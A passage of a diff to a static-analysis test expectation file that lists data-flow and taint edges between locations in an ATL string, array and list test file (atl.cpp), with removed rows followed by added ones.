atl.cpp:1184:3:1184:5 | ref arg s21 | atl.cpp:1185:8:1185:10 | s21 | | -| atl.cpp:1184:3:1184:5 | ref arg s21 | atl.cpp:1212:1:1212:1 | s21 | | -| atl.cpp:1187:18:1187:20 | call to CStringT | atl.cpp:1188:3:1188:5 | s22 | | -| atl.cpp:1187:18:1187:20 | call to CStringT | atl.cpp:1189:8:1189:10 | s22 | | -| atl.cpp:1187:18:1187:20 | call to CStringT | atl.cpp:1212:1:1212:1 | s22 | | -| atl.cpp:1188:3:1188:5 | ref arg s22 | atl.cpp:1189:8:1189:10 | s22 | | -| atl.cpp:1188:3:1188:5 | ref arg s22 | atl.cpp:1212:1:1212:1 | s22 | | -| atl.cpp:1193:8:1193:12 | bstr2 | atl.cpp:1194:20:1194:24 | bstr2 | | -| atl.cpp:1193:8:1193:12 | bstr2 | atl.cpp:1195:8:1195:12 | bstr2 | | -| atl.cpp:1194:3:1194:4 | ref arg s1 | atl.cpp:1197:8:1197:9 | s1 | | -| atl.cpp:1194:3:1194:4 | ref arg s1 | atl.cpp:1198:8:1198:9 | s1 | | -| atl.cpp:1194:3:1194:4 | ref arg s1 | atl.cpp:1201:8:1201:9 | s1 | | -| atl.cpp:1194:3:1194:4 | ref arg s1 | atl.cpp:1203:8:1203:9 | s1 | | -| atl.cpp:1194:3:1194:4 | ref arg s1 | atl.cpp:1204:8:1204:9 | s1 | | -| atl.cpp:1194:3:1194:4 | ref arg s1 | atl.cpp:1205:8:1205:9 | s1 | | -| atl.cpp:1194:3:1194:4 | ref arg s1 | atl.cpp:1206:8:1206:9 | s1 | | -| atl.cpp:1194:3:1194:4 | ref arg s1 | atl.cpp:1207:8:1207:9 | s1 | | -| atl.cpp:1194:3:1194:4 | ref arg s1 | atl.cpp:1208:8:1208:9 | s1 | | -| atl.cpp:1194:3:1194:4 | ref arg s1 | atl.cpp:1209:8:1209:9 | s1 | | -| atl.cpp:1194:3:1194:4 | ref arg s1 | atl.cpp:1210:8:1210:9 | s1 | | -| atl.cpp:1194:3:1194:4 | ref arg s1 | atl.cpp:1211:8:1211:9 | s1 | | -| atl.cpp:1194:3:1194:4 | ref arg s1 | atl.cpp:1212:1:1212:1 | s1 | | -| atl.cpp:1194:19:1194:24 | ref arg & ... | atl.cpp:1194:20:1194:24 | bstr2 [inner post update] | | -| atl.cpp:1194:19:1194:24 | ref arg & ... | atl.cpp:1195:8:1195:12 | bstr2 | | -| atl.cpp:1194:20:1194:24 | bstr2 | atl.cpp:1194:19:1194:24 | & ... | | -| atl.cpp:1200:14:1200:15 | 0 | atl.cpp:1201:27:1201:31 | start | | -| atl.cpp:1203:8:1203:9 | ref arg s1 | atl.cpp:1204:8:1204:9 | s1 | | -| atl.cpp:1203:8:1203:9 | ref arg s1 | atl.cpp:1205:8:1205:9 | s1 | | -| atl.cpp:1203:8:1203:9 | ref arg s1 | atl.cpp:1206:8:1206:9 | s1 | | -| atl.cpp:1203:8:1203:9 | ref arg s1 | atl.cpp:1207:8:1207:9 | s1 | | -| atl.cpp:1203:8:1203:9 | ref arg s1 | atl.cpp:1208:8:1208:9 | s1 | | -| atl.cpp:1203:8:1203:9 | ref arg s1 | atl.cpp:1209:8:1209:9 | s1 | | -| atl.cpp:1203:8:1203:9 | ref arg s1 | atl.cpp:1210:8:1210:9 | s1 | | -| atl.cpp:1203:8:1203:9 | ref arg s1 | atl.cpp:1211:8:1211:9 | s1 | | -| atl.cpp:1203:8:1203:9 | ref arg s1 | atl.cpp:1212:1:1212:1 | s1 | | -| atl.cpp:1204:8:1204:9 | ref arg s1 | atl.cpp:1205:8:1205:9 | s1 | | -| atl.cpp:1204:8:1204:9 | ref arg s1 | atl.cpp:1206:8:1206:9 | s1 | | -| atl.cpp:1204:8:1204:9 | ref arg s1 | atl.cpp:1207:8:1207:9 | s1 | | -| atl.cpp:1204:8:1204:9 | ref arg s1 | atl.cpp:1208:8:1208:9 | s1 | | -| atl.cpp:1204:8:1204:9 | ref arg s1 | atl.cpp:1209:8:1209:9 | s1 | | -| atl.cpp:1204:8:1204:9 | ref arg s1 | atl.cpp:1210:8:1210:9 | s1 | | -| atl.cpp:1204:8:1204:9 | ref arg s1 | atl.cpp:1211:8:1211:9 | s1 | | -| atl.cpp:1204:8:1204:9 | ref arg s1 | atl.cpp:1212:1:1212:1 | s1 | | -| atl.cpp:1205:8:1205:9 | ref arg s1 | atl.cpp:1206:8:1206:9 | s1 | | -| atl.cpp:1205:8:1205:9 | ref arg s1 | atl.cpp:1207:8:1207:9 | s1 | | -| atl.cpp:1205:8:1205:9 | ref arg s1 | atl.cpp:1208:8:1208:9 | s1 | | -| atl.cpp:1205:8:1205:9 | ref arg s1 | atl.cpp:1209:8:1209:9 | s1 | | -| atl.cpp:1205:8:1205:9 | ref arg s1 | atl.cpp:1210:8:1210:9 | s1 | | -| atl.cpp:1205:8:1205:9 | ref arg s1 | atl.cpp:1211:8:1211:9 | s1 | | -| atl.cpp:1205:8:1205:9 | ref arg s1 | atl.cpp:1212:1:1212:1 | s1 | | -| atl.cpp:1206:8:1206:9 | ref arg s1 | atl.cpp:1207:8:1207:9 | s1 | | -| atl.cpp:1206:8:1206:9 | ref arg s1 | atl.cpp:1208:8:1208:9 | s1 | | -| atl.cpp:1206:8:1206:9 | ref arg s1 | atl.cpp:1209:8:1209:9 | s1 | | -| atl.cpp:1206:8:1206:9 | ref arg s1 | atl.cpp:1210:8:1210:9 | s1 | | -| atl.cpp:1206:8:1206:9 | ref arg s1 | atl.cpp:1211:8:1211:9 | s1 | | -| atl.cpp:1206:8:1206:9 | ref arg s1 | atl.cpp:1212:1:1212:1 | s1 | | -| atl.cpp:1207:8:1207:9 | ref arg s1 | atl.cpp:1208:8:1208:9 | s1 | | -| atl.cpp:1207:8:1207:9 | ref arg s1 | atl.cpp:1209:8:1209:9 | s1 | | -| atl.cpp:1207:8:1207:9 | ref arg s1 | atl.cpp:1210:8:1210:9 | s1 | | -| atl.cpp:1207:8:1207:9 | ref arg s1 | atl.cpp:1211:8:1211:9 | s1 | | -| atl.cpp:1207:8:1207:9 | ref arg s1 | atl.cpp:1212:1:1212:1 | s1 | | -| atl.cpp:1208:8:1208:9 | ref arg s1 | atl.cpp:1209:8:1209:9 | s1 | | -| atl.cpp:1208:8:1208:9 | ref arg s1 | atl.cpp:1210:8:1210:9 | s1 | | -| atl.cpp:1208:8:1208:9 | ref arg s1 | atl.cpp:1211:8:1211:9 | s1 | | -| atl.cpp:1208:8:1208:9 | ref arg s1 | atl.cpp:1212:1:1212:1 | s1 | | -| atl.cpp:1209:8:1209:9 | ref arg s1 | atl.cpp:1210:8:1210:9 | s1 | | -| atl.cpp:1209:8:1209:9 | ref arg s1 | atl.cpp:1211:8:1211:9 | s1 | | -| atl.cpp:1209:8:1209:9 | ref arg s1 | atl.cpp:1212:1:1212:1 | s1 | | -| atl.cpp:1210:8:1210:9 | ref arg s1 | atl.cpp:1211:8:1211:9 | s1 | | -| atl.cpp:1210:8:1210:9 | ref arg s1 | atl.cpp:1212:1:1212:1 | s1 | | -| atl.cpp:1211:8:1211:9 | ref arg s1 | atl.cpp:1212:1:1212:1 | s1 | | -| atl.cpp:1219:19:1219:37 | call to source | atl.cpp:1220:8:1220:8 | d | | -| atl.cpp:1238:22:1238:43 | call to source | atl.cpp:1239:20:1239:20 | s | | -| atl.cpp:1238:22:1238:43 | call to source | atl.cpp:1242:1:1242:1 | s | | -| atl.cpp:1239:20:1239:20 | ref arg s | atl.cpp:1242:1:1242:1 | s | | -| atl.cpp:1239:20:1239:28 | call to CStrBufT | atl.cpp:1240:44:1240:44 | b | | -| atl.cpp:1239:20:1239:28 | call to CStrBufT | atl.cpp:1241:43:1241:43 | b | | -| atl.cpp:1240:44:1240:44 | ref arg b | atl.cpp:1241:43:1241:43 | b | | +| atl.cpp:41:31:41:31 | 1 | atl.cpp:41:30:41:31 | - ... | TAINT | +| atl.cpp:79:16:79:27 | call to source | atl.cpp:80:23:80:23 | x | | +| atl.cpp:80:23:80:23 | x | atl.cpp:80:23:80:24 | call to _U_STRINGorID | TAINT | +| atl.cpp:80:23:80:24 | call to _U_STRINGorID | atl.cpp:81:12:81:12 | u | | +| atl.cpp:85:19:85:45 | call to indirect_source | atl.cpp:86:23:86:23 | y | | +| atl.cpp:86:23:86:23 | y | atl.cpp:86:23:86:24 | call to _U_STRINGorID | TAINT | +| atl.cpp:86:23:86:24 | call to _U_STRINGorID | atl.cpp:87:12:87:12 | u | | +| atl.cpp:106:17:106:37 | call to indirect_source | atl.cpp:107:21:107:21 | x | | +| atl.cpp:107:21:107:21 | x | atl.cpp:107:21:107:22 | call to CA2AEX | TAINT | +| atl.cpp:107:21:107:22 | call to CA2AEX | atl.cpp:108:31:108:31 | a | | +| atl.cpp:107:21:107:22 | call to CA2AEX | atl.cpp:109:12:109:12 | a | | +| atl.cpp:107:21:107:22 | call to CA2AEX | atl.cpp:110:12:110:12 | a | | +| atl.cpp:107:21:107:22 | call to CA2AEX | atl.cpp:111:5:111:5 | a | | +| atl.cpp:108:31:108:31 | ref arg a | atl.cpp:109:12:109:12 | a | | +| atl.cpp:108:31:108:31 | ref arg a | atl.cpp:110:12:110:12 | a | | +| atl.cpp:108:31:108:31 | ref arg a | atl.cpp:111:5:111:5 | a | | +| atl.cpp:109:12:109:12 | a [post update] | atl.cpp:110:12:110:12 | a | | +| atl.cpp:109:12:109:12 | a [post update] | atl.cpp:111:5:111:5 | a | | +| atl.cpp:110:12:110:12 | a [post update] | atl.cpp:111:5:111:5 | a | | +| atl.cpp:114:17:114:37 | call to indirect_source | atl.cpp:115:21:115:21 | x | | +| atl.cpp:115:21:115:25 | call to CA2AEX | atl.cpp:116:31:116:31 | a | | +| atl.cpp:115:21:115:25 | call to CA2AEX | atl.cpp:117:12:117:12 | a | | +| atl.cpp:115:21:115:25 | call to CA2AEX | atl.cpp:118:12:118:12 | a | | +| atl.cpp:115:21:115:25 | call to CA2AEX | atl.cpp:119:5:119:5 | a | | +| atl.cpp:116:31:116:31 | ref arg a | atl.cpp:117:12:117:12 | a | | +| atl.cpp:116:31:116:31 | ref arg a | atl.cpp:118:12:118:12 | a | | +| atl.cpp:116:31:116:31 | ref arg a | atl.cpp:119:5:119:5 | a | | +| atl.cpp:117:12:117:12 | a [post update] | atl.cpp:118:12:118:12 | a | | +| atl.cpp:117:12:117:12 | a [post update] | atl.cpp:119:5:119:5 | a | | +| atl.cpp:118:12:118:12 | a [post update] | atl.cpp:119:5:119:5 | a | | +| atl.cpp:132:16:132:36 | call to indirect_source | atl.cpp:134:22:134:22 | x | | +| atl.cpp:132:16:132:36 | call to indirect_source | atl.cpp:140:22:140:22 | x | | +| atl.cpp:134:22:134:22 | x | atl.cpp:134:22:134:23 | call to CA2CAEX | TAINT | +| atl.cpp:134:22:134:23 | call to CA2CAEX | atl.cpp:135:32:135:32 | a | | +| atl.cpp:134:22:134:23 | call to CA2CAEX | atl.cpp:136:12:136:12 | a | | +| atl.cpp:134:22:134:23 | call to CA2CAEX | atl.cpp:137:12:137:12 | a | | +| atl.cpp:134:22:134:23 | call to CA2CAEX | atl.cpp:138:5:138:5 | a | | +| atl.cpp:140:22:140:26 | call to CA2CAEX | atl.cpp:141:32:141:32 | a | | +| atl.cpp:140:22:140:26 | call to CA2CAEX | atl.cpp:142:12:142:12 | a | | +| atl.cpp:140:22:140:26 | call to CA2CAEX | atl.cpp:143:12:143:12 | a | | +| atl.cpp:140:22:140:26 | call to CA2CAEX | atl.cpp:144:5:144:5 | a | | +| atl.cpp:158:16:158:36 | call to indirect_source | atl.cpp:160:21:160:21 | x | | +| atl.cpp:158:16:158:36 | call to indirect_source | atl.cpp:166:21:166:21 | x | | +| atl.cpp:160:21:160:21 | x | atl.cpp:160:21:160:22 | call to CA2WEX | TAINT | +| atl.cpp:160:21:160:22 | call to CA2WEX | atl.cpp:161:32:161:32 | a | | +| atl.cpp:160:21:160:22 | call to CA2WEX | atl.cpp:162:12:162:12 | a | | +| atl.cpp:160:21:160:22 | call to CA2WEX | atl.cpp:163:12:163:12 | a | | +| atl.cpp:160:21:160:22 | call to CA2WEX | atl.cpp:164:5:164:5 | a | | +| atl.cpp:161:32:161:32 | ref arg a | atl.cpp:162:12:162:12 | a | | +| atl.cpp:161:32:161:32 | ref arg a | atl.cpp:163:12:163:12 | a | | +| atl.cpp:161:32:161:32 | ref arg a | atl.cpp:164:5:164:5 | a | | +| atl.cpp:162:12:162:12 | a [post update] | atl.cpp:163:12:163:12 | a | | +| atl.cpp:162:12:162:12 | a [post update] | atl.cpp:164:5:164:5 | a | | +| atl.cpp:162:14:162:18 | ref arg m_psz | atl.cpp:163:14:163:18 | m_psz | | +| atl.cpp:163:12:163:12 | a [post update] | atl.cpp:164:5:164:5 | a | | +| atl.cpp:166:21:166:25 | call to CA2WEX | atl.cpp:167:32:167:32 | a | | +| atl.cpp:166:21:166:25 | call to CA2WEX | atl.cpp:168:12:168:12 | a | | +| atl.cpp:166:21:166:25 | call to CA2WEX | atl.cpp:169:12:169:12 | a | | +| atl.cpp:166:21:166:25 | call to CA2WEX | atl.cpp:170:5:170:5 | a | | +| atl.cpp:167:32:167:32 | ref arg a | atl.cpp:168:12:168:12 | a | | +| atl.cpp:167:32:167:32 | ref arg a | atl.cpp:169:12:169:12 | a | | +| atl.cpp:167:32:167:32 | ref arg a | atl.cpp:170:5:170:5 | a | | +| atl.cpp:168:12:168:12 | a [post update] | atl.cpp:169:12:169:12 | a | | +| atl.cpp:168:12:168:12 | a [post update] | atl.cpp:170:5:170:5 | a | | +| atl.cpp:168:14:168:18 | ref arg m_psz | atl.cpp:169:14:169:18 | m_psz | | +| atl.cpp:169:12:169:12 | a [post update] | atl.cpp:170:5:170:5 | a | | +| atl.cpp:218:13:218:23 | call to source | atl.cpp:222:13:222:13 | x | | +| atl.cpp:221:22:221:22 | call to CAtlArray | atl.cpp:222:7:222:7 | a | | +| atl.cpp:221:22:221:22 | call to CAtlArray | atl.cpp:223:12:223:12 | a | | +| atl.cpp:221:22:221:22 | call to CAtlArray | atl.cpp:224:7:224:7 | a | | +| atl.cpp:221:22:221:22 | call to CAtlArray | atl.cpp:225:12:225:12 | a | | +| atl.cpp:221:22:221:22 | call to CAtlArray | atl.cpp:229:17:229:17 | a | | +| atl.cpp:221:22:221:22 | call to CAtlArray | atl.cpp:244:5:244:5 | a | | +| atl.cpp:222:7:222:7 | ref arg a | atl.cpp:223:12:223:12 | a | | +| atl.cpp:222:7:222:7 | ref arg a | atl.cpp:224:7:224:7 | a | | +| atl.cpp:222:7:222:7 | ref arg a | atl.cpp:225:12:225:12 | a | | +| atl.cpp:222:7:222:7 | ref arg a | atl.cpp:229:17:229:17 | a | | +| atl.cpp:222:7:222:7 | ref arg a | atl.cpp:244:5:244:5 | a | | +| atl.cpp:223:12:223:12 | ref arg a | atl.cpp:224:7:224:7 | a | | +| atl.cpp:223:12:223:12 | ref arg a | atl.cpp:225:12:225:12 | a | | +| atl.cpp:223:12:223:12 | ref arg a | atl.cpp:229:17:229:17 | a | | +| atl.cpp:223:12:223:12 | ref arg a | atl.cpp:244:5:244:5 | a | | +| atl.cpp:224:7:224:7 | ref arg a | atl.cpp:225:12:225:12 | a | | +| atl.cpp:224:7:224:7 | ref arg a | atl.cpp:229:17:229:17 | a | | +| atl.cpp:224:7:224:7 | ref arg a | atl.cpp:244:5:244:5 | a | | +| atl.cpp:225:12:225:12 | ref arg a | atl.cpp:229:17:229:17 | a | | +| atl.cpp:225:12:225:12 | ref arg a | atl.cpp:244:5:244:5 | a | | +| atl.cpp:227:22:227:23 | call to CAtlArray | atl.cpp:228:12:228:13 | a2 | | +| atl.cpp:227:22:227:23 | call to CAtlArray | atl.cpp:229:7:229:8 | a2 | | +| atl.cpp:227:22:227:23 | call to CAtlArray | atl.cpp:230:12:230:13 | a2 | | +| atl.cpp:227:22:227:23 | call to CAtlArray | atl.cpp:234:15:234:16 | a2 | | +| atl.cpp:227:22:227:23 | call to CAtlArray | atl.cpp:244:5:244:5 | a2 | | +| atl.cpp:228:12:228:13 | ref arg a2 | atl.cpp:229:7:229:8 | a2 | | +| atl.cpp:228:12:228:13 | ref arg a2 | atl.cpp:230:12:230:13 | a2 | | +| atl.cpp:228:12:228:13 | ref arg a2 | atl.cpp:234:15:234:16 | a2 | | +| atl.cpp:228:12:228:13 | ref arg a2 | atl.cpp:244:5:244:5 | a2 | | +| atl.cpp:229:7:229:8 | ref arg a2 | atl.cpp:230:12:230:13 | a2 | | +| atl.cpp:229:7:229:8 | ref arg a2 | atl.cpp:234:15:234:16 | a2 | | +| atl.cpp:229:7:229:8 | ref arg a2 | atl.cpp:244:5:244:5 | a2 | | +| atl.cpp:230:12:230:13 | ref arg a2 | atl.cpp:234:15:234:16 | a2 | | +| atl.cpp:230:12:230:13 | ref arg a2 | atl.cpp:244:5:244:5 | a2 | | +| atl.cpp:232:22:232:23 | call to CAtlArray | atl.cpp:233:12:233:13 | a3 | | +| atl.cpp:232:22:232:23 | call to CAtlArray | atl.cpp:234:7:234:8 | a3 | | +| atl.cpp:232:22:232:23 | call to CAtlArray | atl.cpp:235:12:235:13 | a3 | | +| atl.cpp:232:22:232:23 | call to CAtlArray | atl.cpp:237:12:237:13 | a3 | | +| atl.cpp:232:22:232:23 | call to CAtlArray | atl.cpp:238:13:238:14 | a3 | | +| atl.cpp:232:22:232:23 | call to CAtlArray | atl.cpp:242:28:242:29 | a3 | | +| atl.cpp:232:22:232:23 | call to CAtlArray | atl.cpp:244:5:244:5 | a3 | | +| atl.cpp:233:12:233:13 | ref arg a3 | atl.cpp:234:7:234:8 | a3 | | +| atl.cpp:233:12:233:13 | ref arg a3 | atl.cpp:235:12:235:13 | a3 | | +| atl.cpp:233:12:233:13 | ref arg a3 | atl.cpp:237:12:237:13 | a3 | | +| atl.cpp:233:12:233:13 | ref arg a3 | atl.cpp:238:13:238:14 | a3 | | +| atl.cpp:233:12:233:13 | ref arg a3 | atl.cpp:242:28:242:29 | a3 | | +| atl.cpp:233:12:233:13 | ref arg a3 | atl.cpp:244:5:244:5 | a3 | | +| atl.cpp:234:7:234:8 | ref arg a3 | atl.cpp:235:12:235:13 | a3 | | +| atl.cpp:234:7:234:8 | ref arg a3 | atl.cpp:237:12:237:13 | a3 | | +| atl.cpp:234:7:234:8 | ref arg a3 | atl.cpp:238:13:238:14 | a3 | | +| atl.cpp:234:7:234:8 | ref arg a3 | atl.cpp:242:28:242:29 | a3 | | +| atl.cpp:234:7:234:8 | ref arg a3 | atl.cpp:244:5:244:5 | a3 | | +| atl.cpp:235:12:235:13 | ref arg a3 | atl.cpp:237:12:237:13 | a3 | | +| atl.cpp:235:12:235:13 | ref arg a3 | atl.cpp:238:13:238:14 | a3 | | +| atl.cpp:235:12:235:13 | ref arg a3 | atl.cpp:242:28:242:29 | a3 | | +| atl.cpp:235:12:235:13 | ref arg a3 | atl.cpp:244:5:244:5 | a3 | | +| atl.cpp:237:12:237:13 | ref arg a3 | atl.cpp:238:13:238:14 | a3 | | +| atl.cpp:237:12:237:13 | ref arg a3 | atl.cpp:242:28:242:29 | a3 | | +| atl.cpp:237:12:237:13 | ref arg a3 | atl.cpp:244:5:244:5 | a3 | | +| atl.cpp:238:13:238:14 | ref arg a3 | atl.cpp:242:28:242:29 | a3 | | +| atl.cpp:238:13:238:14 | ref arg a3 | atl.cpp:244:5:244:5 | a3 | | +| atl.cpp:238:16:238:22 | call to GetData | atl.cpp:238:12:238:24 | * ... | TAINT | +| atl.cpp:240:22:240:23 | call to CAtlArray | atl.cpp:241:12:241:13 | a4 | | +| atl.cpp:240:22:240:23 | call to CAtlArray | atl.cpp:242:7:242:8 | a4 | | +| atl.cpp:240:22:240:23 | call to CAtlArray | atl.cpp:243:12:243:13 | a4 | | +| atl.cpp:240:22:240:23 | call to CAtlArray | atl.cpp:244:5:244:5 | a4 | | +| atl.cpp:241:12:241:13 | ref arg a4 | atl.cpp:242:7:242:8 | a4 | | +| atl.cpp:241:12:241:13 | ref arg a4 | atl.cpp:243:12:243:13 | a4 | | +| atl.cpp:241:12:241:13 | ref arg a4 | atl.cpp:244:5:244:5 | a4 | | +| atl.cpp:242:7:242:8 | ref arg a4 | atl.cpp:243:12:243:13 | a4 | | +| atl.cpp:242:7:242:8 | ref arg a4 | atl.cpp:244:5:244:5 | a4 | | +| atl.cpp:242:28:242:29 | a3 | atl.cpp:242:27:242:29 | & ... | | +| atl.cpp:243:12:243:13 | ref arg a4 | atl.cpp:244:5:244:5 | a4 | | +| atl.cpp:246:22:246:23 | call to CAtlArray | atl.cpp:247:7:247:8 | a5 | | +| atl.cpp:246:22:246:23 | call to CAtlArray | atl.cpp:248:12:248:13 | a5 | | +| atl.cpp:246:22:246:23 | call to CAtlArray | atl.cpp:253:5:253:5 | a5 | | +| atl.cpp:247:7:247:8 | ref arg a5 | atl.cpp:248:12:248:13 | a5 | | +| atl.cpp:247:7:247:8 | ref arg a5 | atl.cpp:253:5:253:5 | a5 | | +| atl.cpp:248:12:248:13 | ref arg a5 | atl.cpp:253:5:253:5 | a5 | | +| atl.cpp:250:22:250:23 | call to CAtlArray | atl.cpp:251:7:251:8 | a6 | | +| atl.cpp:250:22:250:23 | call to CAtlArray | atl.cpp:252:12:252:13 | a6 | | +| atl.cpp:250:22:250:23 | call to CAtlArray | atl.cpp:253:5:253:5 | a6 | | +| atl.cpp:251:7:251:8 | ref arg a6 | atl.cpp:252:12:252:13 | a6 | | +| atl.cpp:251:7:251:8 | ref arg a6 | atl.cpp:253:5:253:5 | a6 | | +| atl.cpp:252:12:252:13 | ref arg a6 | atl.cpp:253:5:253:5 | a6 | | +| atl.cpp:298:13:298:23 | call to source | atl.cpp:302:20:302:20 | x | | +| atl.cpp:298:13:298:23 | call to source | atl.cpp:310:21:310:21 | x | | +| atl.cpp:298:13:298:23 | call to source | atl.cpp:319:31:319:31 | x | | +| atl.cpp:298:13:298:23 | call to source | atl.cpp:325:23:325:23 | x | | +| atl.cpp:298:13:298:23 | call to source | atl.cpp:333:32:333:32 | x | | +| atl.cpp:298:13:298:23 | call to source | atl.cpp:340:33:340:33 | x | | +| atl.cpp:298:13:298:23 | call to source | atl.cpp:345:46:345:46 | x | | +| atl.cpp:300:26:300:27 | 10 | atl.cpp:300:26:300:28 | call to CAtlList | TAINT | +| atl.cpp:300:26:300:28 | call to CAtlList | atl.cpp:301:12:301:15 | list | | +| atl.cpp:300:26:300:28 | call to CAtlList | atl.cpp:302:7:302:10 | list | | +| atl.cpp:300:26:300:28 | call to CAtlList | atl.cpp:303:12:303:15 | list | | +| atl.cpp:300:26:300:28 | call to CAtlList | atl.cpp:306:26:306:29 | list | | +| atl.cpp:300:26:300:28 | call to CAtlList | atl.cpp:348:5:348:5 | list | | +| atl.cpp:301:12:301:15 | ref arg list | atl.cpp:302:7:302:10 | list | | +| atl.cpp:301:12:301:15 | ref arg list | atl.cpp:303:12:303:15 | list | | +| atl.cpp:301:12:301:15 | ref arg list | atl.cpp:306:26:306:29 | list | | +| atl.cpp:301:12:301:15 | ref arg list | atl.cpp:348:5:348:5 | list | | +| atl.cpp:302:7:302:10 | ref arg list | atl.cpp:303:12:303:15 | list | | +| atl.cpp:302:7:302:10 | ref arg list | atl.cpp:306:26:306:29 | list | | +| atl.cpp:302:7:302:10 | ref arg list | atl.cpp:348:5:348:5 | list | | +| atl.cpp:303:12:303:15 | ref arg list | atl.cpp:306:26:306:29 | list | | +| atl.cpp:303:12:303:15 | ref arg list | atl.cpp:348:5:348:5 | list | | +| atl.cpp:305:27:305:28 | 10 | atl.cpp:305:27:305:29 | call to CAtlList | TAINT | +| atl.cpp:305:27:305:29 | call to CAtlList | atl.cpp:306:7:306:11 | list2 | | +| atl.cpp:305:27:305:29 | call to CAtlList | atl.cpp:307:12:307:16 | list2 | | +| atl.cpp:305:27:305:29 | call to CAtlList | atl.cpp:348:5:348:5 | list2 | | +| atl.cpp:306:7:306:11 | ref arg list2 | atl.cpp:307:12:307:16 | list2 | | +| atl.cpp:306:7:306:11 | ref arg list2 | atl.cpp:348:5:348:5 | list2 | | +| atl.cpp:306:26:306:29 | list | atl.cpp:306:25:306:29 | & ... | | +| atl.cpp:307:12:307:16 | ref arg list2 | atl.cpp:348:5:348:5 | list2 | | +| atl.cpp:309:27:309:28 | 10 | atl.cpp:309:27:309:29 | call to CAtlList | TAINT | +| atl.cpp:309:27:309:29 | call to CAtlList | atl.cpp:310:7:310:11 | list3 | | +| atl.cpp:309:27:309:29 | call to CAtlList | atl.cpp:311:12:311:16 | list3 | | +| atl.cpp:309:27:309:29 | call to CAtlList | atl.cpp:314:26:314:30 | list3 | | +| atl.cpp:309:27:309:29 | call to CAtlList | atl.cpp:348:5:348:5 | list3 | | +| atl.cpp:310:7:310:11 | ref arg list3 | atl.cpp:311:12:311:16 | list3 | | +| atl.cpp:310:7:310:11 | ref arg list3 | atl.cpp:314:26:314:30 | list3 | | +| atl.cpp:310:7:310:11 | ref arg list3 | atl.cpp:348:5:348:5 | list3 | | +| atl.cpp:311:12:311:16 | ref arg list3 | atl.cpp:314:26:314:30 | list3 | | +| atl.cpp:311:12:311:16 | ref arg list3 | atl.cpp:348:5:348:5 | list3 | | +| atl.cpp:313:27:313:28 | 10 | atl.cpp:313:27:313:29 | call to CAtlList | TAINT | +| atl.cpp:313:27:313:29 | call to CAtlList | atl.cpp:314:7:314:11 | list4 | | +| atl.cpp:313:27:313:29 | call to CAtlList | atl.cpp:315:12:315:16 | list4 | | +| atl.cpp:313:27:313:29 | call to CAtlList | atl.cpp:348:5:348:5 | list4 | | +| atl.cpp:314:7:314:11 | ref arg list4 | atl.cpp:315:12:315:16 | list4 | | +| atl.cpp:314:7:314:11 | ref arg list4 | atl.cpp:348:5:348:5 | list4 | | +| atl.cpp:314:26:314:30 | list3 | atl.cpp:314:25:314:30 | & ... | | +| atl.cpp:315:12:315:16 | ref arg list4 | atl.cpp:348:5:348:5 | list4 | | +| atl.cpp:318:29:318:30 | 10 | atl.cpp:318:29:318:31 | call to CAtlList | TAINT | +| atl.cpp:318:29:318:31 | call to CAtlList | atl.cpp:319:20:319:24 | list5 | | +| atl.cpp:318:29:318:31 | call to CAtlList | atl.cpp:319:34:319:38 | list5 | | +| atl.cpp:318:29:318:31 | call to CAtlList | atl.cpp:320:14:320:18 | list5 | | +| atl.cpp:318:29:318:31 | call to CAtlList | atl.cpp:321:7:321:7 | list5 | | +| atl.cpp:319:20:319:24 | ref arg list5 | atl.cpp:320:14:320:18 | list5 | | +| atl.cpp:319:20:319:24 | ref arg list5 | atl.cpp:321:7:321:7 | list5 | | +| atl.cpp:319:26:319:29 | call to Find | atl.cpp:320:26:320:28 | pos | | +| atl.cpp:319:34:319:38 | ref arg list5 | atl.cpp:319:20:319:24 | list5 | | +| atl.cpp:319:34:319:38 | ref arg list5 | atl.cpp:320:14:320:18 | list5 | | +| atl.cpp:319:34:319:38 | ref arg list5 | atl.cpp:321:7:321:7 | list5 | | +| atl.cpp:320:14:320:18 | ref arg list5 | atl.cpp:321:7:321:7 | list5 | | +| atl.cpp:324:29:324:30 | 10 | atl.cpp:324:29:324:31 | call to CAtlList | TAINT | +| atl.cpp:324:29:324:31 | call to CAtlList | atl.cpp:325:9:325:13 | list6 | | +| atl.cpp:324:29:324:31 | call to CAtlList | atl.cpp:326:20:326:24 | list6 | | +| atl.cpp:324:29:324:31 | call to CAtlList | atl.cpp:327:14:327:18 | list6 | | +| atl.cpp:324:29:324:31 | call to CAtlList | atl.cpp:328:7:328:7 | list6 | | +| atl.cpp:325:9:325:13 | ref arg list6 | atl.cpp:326:20:326:24 | list6 | | +| atl.cpp:325:9:325:13 | ref arg list6 | atl.cpp:327:14:327:18 | list6 | | +| atl.cpp:325:9:325:13 | ref arg list6 | atl.cpp:328:7:328:7 | list6 | | +| atl.cpp:326:20:326:24 | ref arg list6 | atl.cpp:327:14:327:18 | list6 | | +| atl.cpp:326:20:326:24 | ref arg list6 | atl.cpp:328:7:328:7 | list6 | | +| atl.cpp:326:26:326:34 | call to FindIndex | atl.cpp:327:26:327:28 | pos | | +| atl.cpp:327:14:327:18 | ref arg list6 | atl.cpp:328:7:328:7 | list6 | | +| atl.cpp:331:29:331:30 | 10 | atl.cpp:331:29:331:31 | call to CAtlList | TAINT | +| atl.cpp:331:29:331:31 | call to CAtlList | atl.cpp:332:20:332:24 | list7 | | +| atl.cpp:331:29:331:31 | call to CAtlList | atl.cpp:333:9:333:13 | list7 | | +| atl.cpp:331:29:331:31 | call to CAtlList | atl.cpp:334:14:334:18 | list7 | | +| atl.cpp:331:29:331:31 | call to CAtlList | atl.cpp:335:7:335:7 | list7 | | +| atl.cpp:332:20:332:24 | ref arg list7 | atl.cpp:333:9:333:13 | list7 | | +| atl.cpp:332:20:332:24 | ref arg list7 | atl.cpp:334:14:334:18 | list7 | | +| atl.cpp:332:20:332:24 | ref arg list7 | atl.cpp:335:7:335:7 | list7 | | +| atl.cpp:332:26:332:40 | call to GetTailPosition | atl.cpp:333:27:333:29 | pos | | +| atl.cpp:333:9:333:13 | ref arg list7 | atl.cpp:334:14:334:18 | list7 | | +| atl.cpp:333:9:333:13 | ref arg list7 | atl.cpp:335:7:335:7 | list7 | | +| atl.cpp:334:14:334:18 | ref arg list7 | atl.cpp:335:7:335:7 | list7 | | +| atl.cpp:338:29:338:30 | 10 | atl.cpp:338:29:338:31 | call to CAtlList | TAINT | +| atl.cpp:338:29:338:31 | call to CAtlList | atl.cpp:339:20:339:24 | list8 | | +| atl.cpp:338:29:338:31 | call to CAtlList | atl.cpp:340:9:340:13 | list8 | | +| atl.cpp:338:29:338:31 | call to CAtlList | 